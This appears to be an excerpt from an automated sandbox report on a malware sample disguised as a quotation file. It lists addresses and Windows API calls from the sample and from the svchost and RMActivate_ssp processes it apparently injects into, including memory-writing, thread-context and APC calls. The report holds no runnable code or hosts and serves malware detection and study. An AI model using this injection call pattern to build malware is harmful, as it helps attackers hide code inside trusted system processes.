Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872CC0 NtQueryVirtualMemory,	1_2_03872CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872CF0 NtOpenProcess,	1_2_03872CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872C00 NtQueryInformationProcess,	1_2_03872C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872C60 NtCreateKey,	1_2_03872C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872C70 NtFreeVirtualMemory,	1_2_03872C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03873090 NtSetValueKey,	1_2_03873090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03873010 NtOpenDirectoryObject,	1_2_03873010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038739B0 NtGetContextThread,	1_2_038739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03873D10 NtOpenProcessToken,	1_2_03873D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03873D70 NtOpenThread,	1_2_03873D70
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B4340 NtSetContextThread,LdrInitializeThunk,	3_2_033B4340
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B4650 NtSuspendThread,LdrInitializeThunk,	3_2_033B4650
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B2B60 NtClose,LdrInitializeThunk,	3_2_033B2B60
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B2BA0 NtEnumerateValueKey,LdrInitializeThunk,	3_2_033B2BA0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	3_2_033B2BF0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B2BE0 NtQueryValueKey,LdrInitializeThunk,	3_2_033B2BE0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B2AF0 NtWriteFile,LdrInitializeThunk,	3_2_033B2AF0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B2AD0 NtReadFile,LdrInitializeThunk,	3_2_033B2AD0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B2F30 NtCreateSection,LdrInitializeThunk,	3_2_033B2F30
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B2FB0 NtResumeThread,LdrInitializeThunk,	3_2_033B2FB0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B2FE0 NtCreateFile,LdrInitializeThunk,	3_2_033B2FE0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B2E80 NtReadVirtualMemory,LdrInitializeThunk,	3_2_033B2E80
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B2EE0 NtQueueApcThread,LdrInitializeThunk,	3_2_033B2EE0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B2D30 NtUnmapViewOfSection,LdrInitializeThunk,	3_2_033B2D30
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B2D10 NtMapViewOfSection,LdrInitializeThunk,	3_2_033B2D10
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B2DF0 NtQuerySystemInformation,LdrInitializeThunk,	3_2_033B2DF0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B2DD0 NtDelayExecution,LdrInitializeThunk,	3_2_033B2DD0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B2C70 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_033B2C70
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B2C60 NtCreateKey,LdrInitializeThunk,	3_2_033B2C60
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B2CA0 NtQueryInformationToken,LdrInitializeThunk,	3_2_033B2CA0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B35C0 NtCreateMutant,LdrInitializeThunk,	3_2_033B35C0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B39B0 NtGetContextThread,LdrInitializeThunk,	3_2_033B39B0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B2B80 NtQueryInformationFile,	3_2_033B2B80
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B2AB0 NtWaitForSingleObject,	3_2_033B2AB0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B2F60 NtCreateProcessEx,	3_2_033B2F60
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B2FA0 NtQuerySection,	3_2_033B2FA0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B2F90 NtProtectVirtualMemory,	3_2_033B2F90
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B2E30 NtWriteVirtualMemory,	3_2_033B2E30
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B2EA0 NtAdjustPrivilegesToken,	3_2_033B2EA0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B2D00 NtSetInformationFile,	3_2_033B2D00
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B2DB0 NtEnumerateKey,	3_2_033B2DB0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B2C00 NtQueryInformationProcess,	3_2_033B2C00
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B2CF0 NtOpenProcess,	3_2_033B2CF0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B2CC0 NtQueryVirtualMemory,	3_2_033B2CC0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B3010 NtOpenDirectoryObject,	3_2_033B3010
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B3090 NtSetValueKey,	3_2_033B3090
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B3D10 NtOpenProcessToken,	3_2_033B3D10
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B3D70 NtOpenThread,	3_2_033B3D70
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_029C7BE0 NtDeleteFile,	3_2_029C7BE0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_029C7B00 NtReadFile,	3_2_029C7B00
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_029C79A0 NtCreateFile,	3_2_029C79A0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_029C7C70 NtClose,	3_2_029C7C70
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_029C7DC0 NtAllocateVirtualMemory,	3_2_029C7DC0

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

Code function: 0_2_009740B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,

0_2_009740B1

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

Code function: 0_2_00968858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00968858

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

Code function: 0_2_0097545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_0097545F

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_0091E800	0_2_0091E800
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_0093DBB5	0_2_0093DBB5
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_0099804A	0_2_0099804A
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_0091E060	0_2_0091E060
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_00924140	0_2_00924140
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_00932405	0_2_00932405
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_00946522	0_2_00946522
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_0094267E	0_2_0094267E
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_00990665	0_2_00990665
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_0093283A	0_2_0093283A
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_00926843	0_2_00926843
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_009489DF	0_2_009489DF
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_00946A94	0_2_00946A94
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_00990AE2	0_2_00990AE2
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_00928A0E	0_2_00928A0E
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_00978B13	0_2_00978B13
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_0096EB07	0_2_0096EB07
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_0093CD61	0_2_0093CD61
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_00947006	0_2_00947006
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_00923190	0_2_00923190
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_0092710E	0_2_0092710E
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_00911287	0_2_00911287
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_009333C7	0_2_009333C7
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_0093F419	0_2_0093F419
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_00925680	0_2_00925680
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_009316C4	0_2_009316C4
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_009378D3	0_2_009378D3
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_009258C0	0_2_009258C0
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_00931BB8	0_2_00931BB8
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_00949D05	0_2_00949D05
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_0091FE40	0_2_0091FE40
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_00931FD0	0_2_00931FD0
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_0093BFE6	0_2_0093BFE6
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_00873630	0_2_00873630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00401000	1_2_00401000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E16B	1_2_0040E16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00401170	1_2_00401170
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00403110	1_2_00403110
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004021D0	1_2_004021D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004019A0	1_2_004019A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E25E	1_2_0040E25E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042D433	1_2_0042D433
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040FCEC	1_2_0040FCEC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040FCF3	1_2_0040FCF3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004024A4	1_2_004024A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004024B0	1_2_004024B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004165FE	1_2_004165FE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00416603	1_2_00416603
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040FF13	1_2_0040FF13
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040DF93	1_2_0040DF93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384E3F0	1_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039003E6	1_2_039003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038FA352	1_2_038FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C02C0	1_2_038C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E0274	1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F41A2	1_2_038F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039001AA	1_2_039001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F81CC	1_2_038F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03830100	1_2_03830100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DA118	1_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C8158	1_2_038C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D2000	1_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383C7C0	1_2_0383C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03864750	1_2_03864750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840770	1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385C6E0	1_2_0385C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03900591	1_2_03900591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840535	1_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038EE4F6	1_2_038EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E4420	1_2_038E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F2446	1_2_038F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F6BD7	1_2_038F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038FAB40	1_2_038FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383EA80	1_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038429A0	1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0390A9A6	1_2_0390A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03856962	1_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038268B8	1_2_038268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386E8F0	1_2_0386E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384A840	1_2_0384A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03842840	1_2_03842840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038BEFA0	1_2_038BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03832FC8	1_2_03832FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03882F28	1_2_03882F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03860F30	1_2_03860F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E2F30	1_2_038E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B4F40	1_2_038B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03852E90	1_2_03852E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038FCE93	1_2_038FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038FEEDB	1_2_038FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038FEE26	1_2_038FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840E59	1_2_03840E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03858DBF	1_2_03858DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383ADE0	1_2_0383ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384AD00	1_2_0384AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DCD1F	1_2_038DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E0CB5	1_2_038E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03830CF2	1_2_03830CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840C00	1_2_03840C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0388739A	1_2_0388739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F132D	1_2_038F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382D34C	1_2_0382D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038452A0	1_2_038452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385B2C0	1_2_0385B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E12ED	1_2_038E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385D2F0	1_2_0385D2F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384B1B0	1_2_0384B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0387516C	1_2_0387516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382F172	1_2_0382F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0390B16B	1_2_0390B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038EF0CC	1_2_038EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038470C0	1_2_038470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F70E9	1_2_038F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038FF0E0	1_2_038FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038FF7B0	1_2_038FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F16CC	1_2_038F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03885630	1_2_03885630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DD5B0	1_2_038DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039095C3	1_2_039095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F7571	1_2_038F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038FF43F	1_2_038FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03831460	1_2_03831460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385FB80	1_2_0385FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B5BF0	1_2_038B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0387DBF9	1_2_0387DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038FFB76	1_2_038FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DDAAC	1_2_038DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03885AA0	1_2_03885AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E1AA3	1_2_038E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038EDAC6	1_2_038EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038FFA49	1_2_038FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F7A46	1_2_038F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B3A6C	1_2_038B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D5910	1_2_038D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03849950	1_2_03849950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385B950	1_2_0385B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038438E0	1_2_038438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AD800	1_2_038AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03841F92	1_2_03841F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038FFFB1	1_2_038FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03803FD2	1_2_03803FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03803FD5	1_2_03803FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038FFF09	1_2_038FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03849EB0	1_2_03849EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385FDC0	1_2_0385FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03843D40	1_2_03843D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F1D5A	1_2_038F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F7D73	1_2_038F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038FFCF2	1_2_038FFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B9C32	1_2_038B9C32
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0343A352	3_2_0343A352
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_034403E6	3_2_034403E6
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0338E3F0	3_2_0338E3F0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_03420274	3_2_03420274
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_034002C0	3_2_034002C0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_03408158	3_2_03408158
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_03370100	3_2_03370100
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0341A118	3_2_0341A118
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_034381CC	3_2_034381CC
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_034341A2	3_2_034341A2
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_034401AA	3_2_034401AA
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_03412000	3_2_03412000
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_03380770	3_2_03380770
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033A4750	3_2_033A4750
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0337C7C0	3_2_0337C7C0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0339C6E0	3_2_0339C6E0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_03380535	3_2_03380535
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_03440591	3_2_03440591
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_03432446	3_2_03432446
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_03424420	3_2_03424420
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0342E4F6	3_2_0342E4F6
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0343AB40	3_2_0343AB40
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_03436BD7	3_2_03436BD7
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0337EA80	3_2_0337EA80
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_03396962	3_2_03396962
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033829A0	3_2_033829A0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0344A9A6	3_2_0344A9A6
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_03382840	3_2_03382840
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0338A840	3_2_0338A840
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033668B8	3_2_033668B8
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033AE8F0	3_2_033AE8F0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033A0F30	3_2_033A0F30
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033C2F28	3_2_033C2F28
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_03422F30	3_2_03422F30
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033F4F40	3_2_033F4F40
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033FEFA0	3_2_033FEFA0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_03372FC8	3_2_03372FC8
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_03380E59	3_2_03380E59
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0343EE26	3_2_0343EE26
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0343EEDB	3_2_0343EEDB
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_03392E90	3_2_03392E90
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0343CE93	3_2_0343CE93
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0338AD00	3_2_0338AD00
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0341CD1F	3_2_0341CD1F
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_03398DBF	3_2_03398DBF
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0337ADE0	3_2_0337ADE0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_03380C00	3_2_03380C00
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_03370CF2	3_2_03370CF2
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_03420CB5	3_2_03420CB5
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0343132D	3_2_0343132D
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0336D34C	3_2_0336D34C
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033C739A	3_2_033C739A
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033852A0	3_2_033852A0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_034212ED	3_2_034212ED
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0339D2F0	3_2_0339D2F0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0339B2C0	3_2_0339B2C0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0344B16B	3_2_0344B16B
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0336F172	3_2_0336F172
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033B516C	3_2_033B516C
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0338B1B0	3_2_0338B1B0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0342F0CC	3_2_0342F0CC
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0343F0E0	3_2_0343F0E0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_034370E9	3_2_034370E9
